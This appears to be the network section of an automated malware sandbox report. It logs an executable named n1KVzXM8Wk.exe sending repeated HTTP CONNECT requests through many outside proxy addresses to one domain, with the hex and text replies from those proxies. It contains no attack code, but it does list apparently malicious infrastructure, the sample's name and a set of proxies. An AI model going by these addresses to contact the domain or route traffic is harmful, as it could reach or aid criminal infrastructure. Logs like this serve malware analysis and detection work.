                                                                                                      Feb 23, 2024 09:45:32.179234982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.681076050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.684030056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1089192.168.2.453073188.166.197.12931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.622379065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1090192.168.2.45191537.187.91.192219816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.622459888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.680743933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680843115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.682420015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1091192.168.2.452098187.190.49.1669996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.622467995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.107677937 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1092192.168.2.452899103.163.51.254806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.634985924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1093192.168.2.451866194.233.78.142316816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.645113945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.680772066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680839062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.682420015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1094192.168.2.45199083.220.168.57101036812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.645216942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.700042963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.815171003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.928765059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:48.943686008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:00.944058895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:13.021934986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1095192.168.2.451796171.244.10.204521786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.653645039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1096192.168.2.45309523.226.4.102806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.664470911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.961941957 CET531INHTTP/1.1 405 Method Not Allowed
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      Allow: OPTIONS,HEAD,GET,POST
                                                                                                      Content-Length: 331
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1097192.168.2.453123104.23.125.117806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.667151928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.754796028 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1098192.168.2.452004191.250.158.15980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.667152882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.846744061 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1099192.168.2.453112157.25.92.7431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.671920061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.860168934 CET1286INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid/3.5.28
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 1002
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      Content-Language: en
                                                                                                      X-Cache: MISS from ah_test
                                                                                                      Via: 1.1 ah_test (squid/3.5.28)
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 46 72 69 2c 20 32 33 20 46 65 62 20 32 30 32 34 20 30 38 3a 34 35 3a 32 34 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64
                                                                                                      Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://heygirlisheeverythingyouwantedinaman.com/*">https://heygirlisheeverythingyouwantedinaman.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Fri, 23 Feb 2024 08:45:24 GMT</p></d


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1100192.168.2.45310243.133.80.236156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.671998978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1101192.168.2.452048160.251.141.20880806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.682738066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.700088024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.966140032 CET58INHTTP/1.1 200 Connection established
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1102192.168.2.452074158.247.237.22378016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.683049917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.700104952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.815187931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.928859949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.311142921 CET131INHTTP/1.1 503 Too many open connections
                                                                                                      Content-Type: text/plain
                                                                                                      Connection: close
                                                                                                      Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                                      Data Ascii: Maximum number of open connections reached.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1103192.168.2.452146109.123.254.43144746812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.700407028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.700119019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.815169096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.928777933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:48.943741083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:13.021797895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1104192.168.2.453124164.92.237.188637226812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.710107088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.178231001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.865866899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.975158930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.178358078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.366038084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.475358963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.682435036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.756236076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1105192.168.2.453109115.74.153.410806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.730652094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1106192.168.2.453133185.162.231.254806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.739211082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.826313019 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1107192.168.2.453143185.162.229.127806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.787050009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.874531984 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
